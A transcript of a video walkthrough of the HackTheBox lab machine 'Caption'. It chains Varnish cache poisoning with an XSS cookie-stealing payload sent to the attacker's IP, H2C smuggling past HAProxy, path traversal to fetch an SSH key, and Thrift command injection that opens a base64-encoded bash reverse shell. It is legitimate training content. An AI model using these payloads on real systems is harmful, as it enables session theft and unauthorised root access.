What's going on YouTube? This is Ipsec, and today we'll be doing Caption from HackTheBox. The main difficulty about this box is identifying the vulnerabilities because while it is web exploitation, the vulnerabilities don't lie within the web code, but instead the infrastructure itself. The website's behind a Varnish caching server and HAProxy load balancer, both of which have misconfigurations. The caching server doesn't have any hashing configured, so everyone gets the same cache page, which means if we tamper with a tracking cookie to poison the cache with a cross-site scripting payload, anyone browsing that page will hit our cross-site scripting payload, and that's how we can get a admin cookie. That lets us access other endpoints like logs and download, which has a path traversal bug that lets us download an SSH key. But HAProxy is blocking our IP address from hitting those endpoints. However, HTTP2 allows for multiple requests in a single request, which can bypass the HAProxy access list. And we'll use a tool called H2C Smuggle to do that. And then the root step, we just have to communicate with a Apache Thrift service that's written in Go. It has a trivial command injection vulnerability. So with that being said, let's jump in. As always, we're going to start off with an nmap. So -sc for default scripts, -v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it caption. Then the IP address of 10.10.11.33. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open. The first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80, and it's not telling us anything about the banner, so I'm guessing it doesn't have like that field in the HTTP request. We can kind of see all the fields here. The server responded with a 301 moved permanently, 0 content length, and the location is caption.htb. So we can go ahead and add this to our host file. So let's do a sudo v etc host, and then we can add 10.10.11.33 caption.htb. Save that. And let's look at the last one. We have port 8080. This is giving us a JSession ID cookie. So this is definitely web. And then looking through this, maybe it's Gitbucket, which is a like GitHub open source type of thing. Definitely kind of looks like that based upon it, but oh, there we go. The title definitely is Gitbucket. But let's take a look at the main website first. And if you don't like looking at like the HTTP fields and nmap output, you can always do a curl-i and then the IP address, so 10.10.11.33. You may want to put like HTTP or HTTPS, right? If you run that, it'll just give you the header. So we can see it's moved permanently. It's caption.htb. So we can add this and see what the server header is, which is just workzug. We also see Varnish, which is a caching thing. We can see the age of this cache is 0 and not much else, right? So let's just go take a look at the actual page. So I'm going to go to HTTP caption.htb. And we have a login portal. So the very first thing I always like doing is looking at the page source just to see if it leaks anything what it's built by. I don't see anything like identifying here. I don't know exactly what this is. Probably just some like open source like theming thing. It's probably doing that like weird cursor, right? You can also click on like Wapalizer to see what it says. It thinks it is definitely going to be Flask. It's got Varnish. Not much else, right? If you don't know what Varnish is, we'll talk about it in a little bit because there's going to be a vector there. But you can always just go to like ipsec.rocks and then type in these things and see if I've talked about it before. We talked about it and forgot. But anyways, looking at Gitbucket, there are 2 different repositories. There's this Caption portal and LogService. So if we go to Caption portal, it is a portal to manage all your devices in a single place. And if we go to app, it looks like it's just got like the static stuff like index.html. This doesn't look like the Flask application. So if we go to config, we can see the various configs. So we got HAProxy, service, and Varnish. If we look at HAProxy, it's got the config here. If we look at the service files, maybe we should just pull this and look at it on our box instead of in Firefox. I'm not sure. Let's see. So looking at the config here, we can see the HAProxy is going to bind to port 80. So I'm going to do some notes real quick. So we have port 80. I'm going to say HAProxy. And where does this go to? So looking at it, it's going to send things to port 6081. So HAProxy, if you don't know, is just like a high availability proxy. So you could have like multiple web servers running. If you take one offline, then HAProxy won't route requests to that one web server, so you can update it and keep your website up and running. It's also good just for like balancing load and doing things like that. We also see they have a ACL restriction in place for /logs and /download. So we'll probably look at that in a little bit. It's just something to take note on. So HAProxy blocks logs and downloads. Okay. Let's look at the service file. So right now, the main thing I'm looking for is where is HAProxy sending the traffic to? It's on port 6081. So we just want to see what listens on that. And looking at the varnish.service file, we can see it listens on 6081. I forget what A stands for, but this is the bind address. And I want to say this is the administrative address. So if you wanted to go to like the Varnish administrative service, that would be on port 6082. We could test if this is open. So nc-zv 10.10.11.33, what I say it was, 6082, and connection refused. So we can't connect to Varnish directly, but we see Varnish is listening on port 6081. So if we go back to our notes, we can say Varnish 6081. And let's see, the next thing we have to find is where Varnish is sending it to. If we look at the Varnish config, I don't know, maybe language, it's going to send everything to port 8000. And there is no logic on how it's hashing each page. So the cache is going to be the same for every user. Normally on like the VCL receive, I think this is where you put like the what you want to be hashed, and that would make it unique to each user. So when a page goes to Varnish, it would take like the user agent, the cookie of the user, and then cache it for that, right? And that way, anytime the user requests the page again, it's going to give them their cache. If you don't do any targeting on the cache to the user, then other users will be able to get the other user's cache, and that becomes like a cache deception attack, I think it's called. But again, I would highly recommend going to ipsec.rocks, searching for Varnish, and then looking at this video because I go in depth to talk about the whole attack. So definitely that is something to be interested in. We can add this to the notes. So we can say Varnish has no hash rules, same cache for all. Okay. And that is going to be pointed to port 8000, which I'm going to guess is the Flask server since that's the default port and we don't have any other technologies in play here. So the other thing we could look for is the commits. We could look at old commits to see what there is. So we have a HAProxy bypass right here. Let's see, I did not click the right thing to see what they changed. So right here, they added a multi/path regular expression. So it's denying if there's multiple slashes. So what I'm guessing here is because this ACL restricted page has the path begins URL decode /logs, maybe at one time, like the multi/ thing, if you did like /logs, then would be a bypass because it's just looking for /logs and you give it /logs, which is kind of the same thing, right? So that was probably what that commit is there for. Let's look at the other commits. We add Varnish config, we add config files. Looking when config files are added is always good because sometimes people add a sensitive config the first time and then go in and fix it later, right? So backend config here. And we have credentials. So the front end, it was denying any HTTP request unless they were an authenticated user. And we have Margo and this password. So let's go ahead and add this to a creds file. So we'll do v creds.txt, Margo, and put that password in. And we can try logging in to Caption with this, right? If we went to the login portal, we do Margo and put in this password, and it lets us log in. Awesome. So here we are looking at the portal. If we click on firewalls, we can see services are undergoing maintenance. So nothing is accessible here. If I go to logs, we get that forbidden. And remember, if we go back to the notes, HAProxy is blocking this logs. So my very first thing is maybe the Flask application doesn't have any authentication here. It's just the front end blocking us, or whatever you want to call the technology. So it's HAProxy. So my first thought is let's send this over to Burp Suite. And then I'm going to intercept is on. We can refresh this, send it to the repeater tab. And I'm going to add a capital A here so I can quickly find this in the hex output. So that's going to be right here, I believe. Yep. And I'm going to change this to a 09. But we can leave this as A. We get the not found, right? And I'm going to change it to 09 to see if we can access it. We get forbidden. And the reason why I thought of doing this is because it's a Python web application. It's using WorkZug. And WorkZug always does rstrip on all the fields, right? So this is common in like Nginx configurations. Let's see. Well, I'll say common. It's not really a common thing, but I talk about this attack a lot more. And let's see. This video, Skyfall. So if you want to know more about this attack, I definitely recommend going to the Skyfall video. But essentially, we have the HTTP request. So it's this, right? I think that's the line. And applications would call a split on white space. So they get the verb, then they get the path, and then they get the protocol, right? So we added a \x 09, which is like a carriage return. And now when the hope was when HAProxy sees this, it grabs this, says, okay, this isn't on the matching list, so I'm going to allow it. And then when Flask gets it, WorkZug calls rstrip on the path, and then that will remove that. And when it goes to routing logic, it gets to logs. But this didn't work, so we can move on. I definitely recommend watching Skyfall if you want to know more of the attack. It's pretty cool. The other thing we could potentially do is something called H2C smuggling. So let's test that out real quick, and we'll get a Python application, and then I'll go over it once we run it, right? And essentially what we do is we'll start a HTTP request and say we want to upgrade to HTTP 2. And then when we're in HTTP 2, we can make multiple page requests in one session. And a lot of the proxies will only watch the first request. So we make it to /home. And then in that same session, we say, okay, also give us /logs, and then it allows us. So that's what this whole H2C smuggling is. It'll probably make more sense once we run it once and look at it in Wireshark. So let's do a Python 3 H2C smuggle. We provide a server to smuggle. So we'll do caption.htb. I think there's a --test flag to test if it works. And it says it does. So let's now go to HTTP caption.htb/logs. And it's requesting /logs and looks like it is hanging, which is weird. Did I typo that? Caption.htb logs. Okay, it gave the redirect. Let's see. And it may be redirecting us because we're not logged in. So let's do a header and then specify the cookie. And the cookie is going to be session. And let's look at what our cookies are for a logged in user. I'm going to go to the storage tab, get session, copy this, paste it, and I need a equals. So we need to do session is equal to that. Okay. And we still get an error. But our location changed. We have a role error now. If we did it without that cookie, we just had a location /. So here we're saying our user is not authenticated. So we have a bypass here. We've definitely validated we can hit this logs endpoint, but our user also is not good. So if we go back to our notes, let's see. I did not take good. Oh, we have the Varnish. So if we can do any type of hash deception attack, we may be able to redirect the user's browser back to us and then steal the cookie or hit this endpoint, right? So now my thought is, let's look at the cookie configuration, and we see session is not set to HTTP only. So this should be really easy to steal if we can get some JavaScript running on another user's browser. So this is where we're going to start looking at Varnish, and I don't know why I'm not logged in. Let's do Margo. And what is that password? That's why I have this threads. So we can copy this and log in quickly. JavaScript changing the mouse is super annoying. So let's see. I'm going to intercept this. We have to turn it on here. There we go. Okay. So if we look at this, the age is always 0 on home. So that means we're not caching the home page. If we look at firewalls, is it firewall? 404 not found. Oh, I'd have 1L. There we go. So firewalls, we have an age on this cache. So the page is just being cached to us. And again, we're going under the assumption that the rules we saw on GitHub were good and there wasn't anything hashing it to make it unique per user, right? So this is just going to be a complete cache thing. A lot of times when you do caching, you'll take like the session cookie in. So this hash deception attack does not work. So I'm going to play with it on /home because we don't have anything caching, right? If we did it on the firewall endpoint, we'd have to like look at the page consistent, like every minute or 2 minutes to always get the fresh version. And that's not fun. So looking at this, one thing is sticking out. We have this URL internalproxy.local. And we see it referenced multiple times, and it's UTM. I forget exactly what UTM stands for. I want to say like Universal Tracking Method. It's definitely a tracking thing. A lot of like websites use it to track where you're coming from on the web. So my very first thought is, let's set up a search. I'm going to do search for please subscribe. And I'm going to try to change what internal proxy is set to. So I'm going to auto scroll on match. And I'm going to do a argument first. So we can do UTM_source is equal to please subscribe. And no highlights. Let's try UTM is equal to please subscribe. Nothing. Normally these session cookies are done, or these UTM things are normally done in cookies. And it's not setting it, so I don't think it's there. My thought is maybe the proxy is setting this. So the website knows it's going through the proxy. I don't see it in like the HAProxy config, but if it was, it would probably use like an X forward header. So we can do X forward. Is it X forward or X forwarded? Let's see. X forward headers, HTTP. I have to turn intercept off. X forwarded. Okay. So let's do please subscribe. Nothing there. We do host. There's like X forwarded for, X forwarded IP, X forwarded host. There's 4 headers, right? We can see the X forwarded host allows us to change this. So now I want to see if I can put some type of JavaScript here. So I'm closing out the script so we can then write a new one. So let's do a script like this. And then I'm going to just say fetch HTTP 10.10.14.8. And we'll add the cookies. And I think it's A to B to base 64. It may be B to A. I always get those two confused. So we'll do /script here. And then I'll do a open quote just to close this last thing out, right? So now if I send this, we can see what it looks like. So we're loading this script, which will error out. Then we have a new one that should send a cookie to us. We close that script out, and we have an extra /script. So let's do like that. And there we go. All the HTML is, I think, valid. I don't know if that's valid or not, but that shouldn't cause an issue. So this should be good. So let's do sudo nclvnp on 80. So we're going to listen on that. And I'm going to test this on myself, right? So let's go to the home page. We can refresh this. We need to set the proxy on. And we're going to add our header. We'll forward the request. And then hopefully I see multiple come back. It just kind of froze. Do we have like bad HTML and it just broke the whole thing? Ordered for. I'm gonna get rid of that script. That shouldn't matter. For that. Okay. We go to console tab. String contains an invalid character. So something is wrong. I wonder if it's this A to B thing. We go here. B to A. Document.cookie. There we go. It's B to A, not A to B. That's probably what caused the issue. And I don't think we want that open script. That should be fine. Let's test this again. And this is why we always test against our own browser, because we can easily see those types of error messages, right? Paste this, forward, and we get multiple requests back. It's trying to send us our own cookie, right? And this is what we want to see. So there we go. We have a cookie here. So let's go ahead and test this against another page, right? I'm going to test it against the firewall page. And the reason why I'm doing that is because we saw the age actually went up here, right? So if we get this and we'll want to intercept it. So let's turn intercept on, refresh. And then I'm going to send it in my repeater. We will put our cookie here. And the age is 13. So we did not cache it, right? We want to keep hitting this until we see the age reset to 0. And then the UTM source gets set back to us. And it's probably going to be like 30 or 60 seconds. It's probably a minute if it's not here. So yeah, it's probably going to be another 30 seconds. So once we do this, then we could remove the X forwarded host and the UTM source will still point back to us because it's a cached page, right? We got another 15 seconds to wait until this comes. And then hopefully when someone browses that firewall page, then we'll get it over in this window, we'll get their cookie, and maybe there'll be a role where we can then use that H2C smuggling attack in order to access what's on the logs page. And this cache is still there. So I'm gonna probably pause the video and we'll wait for 2 minutes to hit. Okay, I think it's probably been about 2 minutes. Let's hit this again. And there we go, age is 0. And it now says, please subscribe here. But if we scroll down, we can see our stuff, right? We don't have a hit yet, but I'm going to make a request without that. And we still see the page is reflecting that again, because the whole age thing here, right? So this is definitely going to be cached right now. And we just have to wait to see if anyone is hitting that firewalls page. We could also, let's see, was there anything else that was blocked? It was firewall. We could maybe do routers is doing the same thing as firewall. The logs page is blocked. There is also download, but we can't hit that. So I don't think that would do any good for us. We do have a request come in. So the first thing I want to do is unbase64 encode this, and then we're going to see if this is a different user. So let's do echo base64-d. We can put this on a new line to make it a bit easier. This is going to be a JWT, and there's base64 period, base64 period, base64. So it's probably going to be the middle parameter. And if we look, the user is admin. So we have successfully stolen a admin cookie. So let's go ahead and put this as our session. So let's go to our browser. We can go over to the storage tab, cookies, session, paste this in. And now we're logged in as admin. We can turn intercept off. We're still seeing our nasty caching, right? If we go to home, we can go over to logs, and it's still forbidden. But we can go back to our smuggling thing, the H2C smuggle. So let's try that. We'll just run it again because I don't know all the flags. So we do H2C smuggle, HTTP caption.htb, and then the -x first. Yes. So we can do -x. then the page we want to hit. So we'll do caption.htb/log. Is it logs? And then we'll set the header. So we'll do cookie session is equal to this. And there we go. We have hit the logs page, and we can see the download URL and SSH log, firewall log, Zeek logs. But before we move on real quick, I realized I did say we'd look at it in Wireshark and then never did. So let's look at what this is doing in Wireshark. So hopefully you can understand the whole H2C smuggle, right? Okay, we can stop intercepting. So the very first thing we do is we make a GET request to /, right? And our GET request is going to have us upgrade to HTTP 2, which is going to be more of a binary protocol. So we're not making the same request every time. It saves a lot of overhead because every future request we make in this HTTP 2 tunnel, we don't have to include every header, right? So we say we want to upgrade. The server says, yes, you are upgraded. And now here, we're sending a new header. Oh, that's probably the original request, right? Where is, so 10.10.14.8. Where is it going to be? Settings. Okay, right here. So this is all related to the first one, but here we're saying, okay, we're going to update the header on get logs. And because we're in this binary protocol, it's not the very first request, then the Varnish config isn't stopping us, right? This, where is it? No, not Varnish, the HAProxy. I kept saying Varnish, but it's actually HAProxy here. This is only monitoring HTTP 1, or the very first request. So we start the request on home, then we upgrade to a tunnel, and that's going to cause HAProxy to no longer monitor any of this stuff. And now that we have that tunnel and HAProxy is not looking at us, then we say, hey, now go grab logs. So that's what the smuggle does. We could probably follow HTTP2 stream. You can see it. So here it is setting the method get. And this is just path /logs, right? But it's a bit more efficient to do it this way in the tunnel. That's why HTTP2 is thing, because you're not resending all the headers. You treat it as one big request. There's no IO of opening the socket again. But in this case, the firewall isn't monitoring that. So that is the smuggle. So let's look at the logs. So we can do this download on SSH logs. And let's go here. Instead of logs, we'll hit the page download. And let's see. And this doesn't look just like SSH logs. This is probably just like the messages or syslog of the box, because we see cron, we see SSHD, we see everything, right? What I'm more interested in is users. So let's just grab all this data, and we're only going to get SSH stuff, and we can filter based upon that. So let's go here. Let's v SSH logs, paste, and I'm going to grep -i SSH on SSH logs. And then let's see if we do grep -i accept, we see accepted password for root. We have Margo here. We also have a public key for Margo, and it's ecdsa. So that's a somewhat unique SSH key, which will come into play later. This is just a hint later. We'll show multiple hints at ecdsa is in use, but yeah, let's go. What I'm looking for here is failed password. So if I grep -i fail, I'm just seeing if there's maybe any type of username that he put a password in for instead. Don't see that. So that is logs. We could go through each of those, but I think SSH logs is the only thing that had something minorly beneficial. We just do a get on / to try to see what this port is. The port, what is it? 3923. Let's see. Does this give us anything? Requesting downloads, Varnish. We don't really know much, but we have this CPR, and we also have port 3923. So if we Google port 3923 CPR, maybe we can identify what this is. Potentially copyparty. And there's a directory traversal right here. And it says it's a file server, which makes sense based upon this. There's detected in the CPR folder. And if we do %2f, there's a directory traversal. So let's look at this real quick. So it shows we do %2f, and then we can do like etsy percent. Do they do, yep, %2f logs. And we don't get, oh, not logs, passwd. I don't know why I thought logs. There we go. But we still don't get the passwd file. And what could be happening here is we have 2 slashes on download. That does not appear to affect us. Okay. We may need to double URL encode this because this is going to the download URL. And if Flask is doing a URL decode here, then when it does the second request, it still has to be encoded, right? So I'm going to add a 252f, and %25 is % encoded, right? So what we're doing is double URL encoding. So slash is 2f, right? And what we're doing is a 25, which is %. So when it decodes this %25, it's left with a %, and then we got %2f on the second request. And it's still, let's see. Oh, we need the .cpr. .cpr. There we go. We can get rid of the double URL encode real quick to see if we actually needed that. We do. So again, we need that just because we're doing a server-side request forgery along with this attack, right? It's being decoded once as part of that. So this next step is somewhat hard to spot, right? Normally when we have server-side request forgery, the first thing we do is go for the, what is it? Proc self environment file to find out exactly who we are, but we don't have access to that file. And before I do that, I'm just going to show real quick that we only need the %252f on the very first slash, and it still works. So this is going to make it a little bit easier just for us to read, because my eyes, when I see %252f, it doesn't translate that to slash well. I like just doing it this way because it makes this much easier to read, right? Otherwise, it would be %25 wherever you see that slash. So if we try to access the environment file, we don't get anything. And if we got a 404, like if this file doesn't exist, we get the page back. So we know the page exists, but we're not getting anything. I also thought maybe we have to add the range header. So we can do range bytes is equal to 1 through 24. I want to say that's how you use the range header. And we don't. Sometimes with like accessing these files, if you do the range and have it in the request, it just magically works. But here, I could never access the environment file, which sucks because the next step is figuring out you're running as one of the users on the box and getting an SSH key. So we could just guess, right? So we could do home, Ruth, and then let's see, bashrc, because that's going to be a default file in the directory. We don't get anything. We do home Margo bashrc, we get the bashrc file. So we can go inside of Margo's home directory. We could try SSH, right? And then ID RSA for like the private key. We don't have anything there. And this is what I was saying. They used, what is it? ecdsa, which is slightly unique. If we looked at the authorized keys, we'll also see that as well. ecdsa here. So that private key file, I think, is just ID underscore ecdsa. There we go. And we have the private key. So we can grab this key and then try SSHing as Margo. So let's do vmargo.ecdsa, I guess. chmod 600. Then sh-i, Margo at 10.10.11.33. And we get logged in. And the first thing I always do when I get into a box that I got in through web is look for like credentials. If we do a ls, we have the app directory. So let's see, if we go less on app.py, Let's see. How are we doing logins? Margo. Okay. So we have hard-coded usernames. There's no actual database. Margo's password is this, and admin's password is this. So let's go back to creds, and we can say admin that. We can close out a Wireshark. We don't need that anymore. We could try a sudo -l password for Margo. We can see, does this work? It probably does not. Nope. Try this password. And no, we don't have Margo's password. We could also just try the super easy SU to see if that is root's password, and it is not. So that doesn't really get us anything. The one thing I kind of skipped over in the beginning was this LogService branch and the GitHub. And this is going to be a custom Go application. If we look at it, we can see it's going to listen on port 9090, and it's starting a, what is this? It's Apache Thrift. So it's just starting an Apache Thrift service, which is kind of like gRPC. It's just going to be a binary protocol. So if we do sslntp grep 9090, we can see something is listening, ps-ef grep on root. Let's see, we have cron, HAProxy, and we are running the server.go binary. So it is running this as root. And if we look at it, we have a exec command, and it's really silly. It's execing the command echo. If this is your Go application, probably should not use like sprintf, just use printf here, and then this will echo itself, right? There's no reason to use the exec command here, but I digress. So let's look at this real quick. Normally with like these binary protocols like gRPC, Thrift, there's probably a few others, there's going to be some file here. This is going to be like the protocol buffer file is what I normally call it, because that's what gRPC technology is. And that's what I'm more used to. It's going to say the service and then the RPC endpoints and the arguments, right? So this is going to be the thrift file. And then you can use a compiler to compile this to be whatever language you want, right? So Thrift probably supports like Python, Ruby, PHP, whatever. So you'd give it this file, specify the language you want, and then it would auto-generate this code for you. That just shows how to interact with this binary protocol. So it kind of creates, I don't know what to call it exactly, but when we create the client, hopefully it'll make a bit more sense. So all we have to do is make a thrift thing. We make that request to read a log file, and then it's going to open that log file. It's going to give a few regexes, and then it's going to send it to this exec call. So what we want to do is be able to escape this exec call. So we're going to give it a single quote, which will escape the echo. Then we can give it a semicolon and then run whatever command we want. So the tough thing here is creating the client to talk thrift, right? That's the challenge. So let's do a git clone on this. I'm in a empty repository. Okay, that's weird. I'm just going to download the zip. LogService main. Unzip, downloads, LogService. There we go. RMRF, LogService, move. Okay. So let's see. The first thing I'm going to do, and you don't have to do this, is I'm going to delete the auto-generated directory just to show it's auto-generated. And I already have the Thrift compiler installed. If you do, I think it's thrift-compiler on Parrot. Yep. So you could, if you install that package, then you have the Thrift binary, and you can specify what language you want. So I'm going to do Go. And then you just specify the file, and it creates that gen Go, right? We could do probably, I'm going to guess Python. Unable to get generator for Python. Do I just not have it installed? Oh, it's Py. So if we wanted to use Python, There we go. We have the auto-generated Python library, right? So I'm going to keep it on Golang just because that's what I'm more comfortable with nowadays. And also that's what the server's written in. So it makes it a bit easier just to do this all in like autopilot or something like that. The one odd thing is we don't have the go init file. So I'll do go mod init, and I'm going to call this LogService, I guess. There we go. Go mod tidy. And then let's make sure we can run this. LogService is not found. Let's see. It's probably going to be the package name. And then was it gen-go LogService? There we go. I wonder if I should have started this with a capital letter. I don't know if that matters. But this looks fine. This exec. I don't know how they mounted OS. What is that? We'll keep going. Let's build the client. So I'm going to do new folder, and I'll call this, we'll do internal, and then we'll do CMD. Neuter trash. It really doesn't matter what you call these folders. CMD, and then new folder. Let's call this RCE, I guess. And then new file, we'll call it main.go. There we go. Package main. I don't know why it did that. There we go. And then let's do func main. And then we need to connect to this. So let's see. I'm going to connect to this socket. Grab this. And that. Import. Okay. We probably have to do a go get against this, I would think. Let's go mod tidy already did that for us. Connect to Thrift server. Okay. Port 9090 is good. That's good. We open the transport. Okay. So we autopiloted our way all the way to get a client. So now we can do client read log file and then specify what file we want to read. What does this return? String and error. So we'll do out error, or I'll do a response. Response error like that. Error's nil, fatal. There we go. And read log file would do dev shm. Please subscribe.log. Do you have to give it like a context or something? Yep. CTX context.context. Context.background actually. And I don't know exactly how to explain context if you don't know exactly what it is. A lot of Go things will use it. A lot of people use it for like not concurrency, like timeouts. So we could say the timeout CTX is equal to context with value. I guess that's doing it with the thrift way, right? It would be context with timeout, right? Timeout CTX. And then the duration, 10 times time dot second, right? We have to give it cancel probably. So this would now create a context that has a 10-second timeout. So in this function, once 10 seconds hit, it would automatically exit is the idea, right? You can also put other things on this. So like if using a database, you can put a pointer to the database object in it. So Your function doesn't have to reconnect to the database. It can just reuse the one out of the context and a bunch of things like that. We're not doing anything fancy with context, so we just say background it, right? So this should connect to port localhost 9090, send the request, read log file, and it's going to read this log file on the server. So what we have to do is go back to the server, cd dev shm, b, please, I think I did a capital, I don't know why I did that. And we'll put test here. Okay. So what I'm going to do is the very first thing on the line, I'm going to do squiggly C, which puts me in this SSH prompt, and we can forward port 9090 back to us. And now on my local box, I have port 9090 coming back. So I'm going to go in cmd, rce, go run main.go. And hopefully it connects to us and we'll see the response. Log file has been processed and looks good. I guess it's not echoing back any information. So what we want to do is go into this log file, and I guess we could change it to something that does not exist. So if we do, please subscribe to no such file or directory. So we definitely know it's working, right? So we want to trigger the RCE. So let's go look at the server again, read log file. It's doing some regular expressions, IP, user agent. IP, we can only do digits. User agent, we accept anything. So let's do, it's doing user agent in quotes like this. And then it goes until it sees another quote. And all we said we wanted to do is escape it. So what this should do, let's just paste this in real quick. We can paste right here where the %s is. Or actually the value. Is that going to do it? We take this. Yeah, because it's only going to take what's in the parentheses for the regex, right? So we're taking this single quote. Is what we take. So we terminate this single quote, and then we can execute our own thing. So that looks good. What we want to do is now create a reverse shell. So I'm going to do it in base64. So we can do bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. base64 w0. And the reason why I'm putting it in base64 is we can avoid a lot of just bad characters. If we did like the bash-c bash-i thing, we may have to use both quotes, which would break the payload. This lets us do it without quotes, which just makes it easy. So we can do echo base64-d, pipe it over to bash, like that. I think that's good. Let's do nc lvnp 9001. Run our client, log file processed, and we did not get a shell. So I'm going to run this command just to make sure. So it does give us a shell. We may have an error with our program though. Maybe we want to put a space after the semicolon. I can't imagine that's it. Log file processed. We don't get anything. Okay, so let's do regex 101 and see what we're missing, because this is going to be something probably really silly. I'm going to specify Golang. Go back to the server. We have this. And I want to insert my string. Oh, I got the shell there. Okay. Maybe it was the spaces I needed. I'm just going to run this again to make sure. Log file processed. I don't know where that shell came from. That is bizarre. Okay. Let's just keep going with what we were doing. Maybe you don't get the shell right away. Maybe something has to time out. Insert my text. Yeah, I think something just has to time out. So I think we're good. It just doesn't happen as fast as I thought it would. But what I'm doing here is looking at exactly what I mashed in the group. And this is just testing out our theory. There we go. That does look fine, right? We want to mash a single quote and then semicolon and everything. So I think for some reason, the service just isn't instantaneous. I couldn't say why, but we have it there. So hope you guys enjoyed the box. Take care, and I'll see you all next time.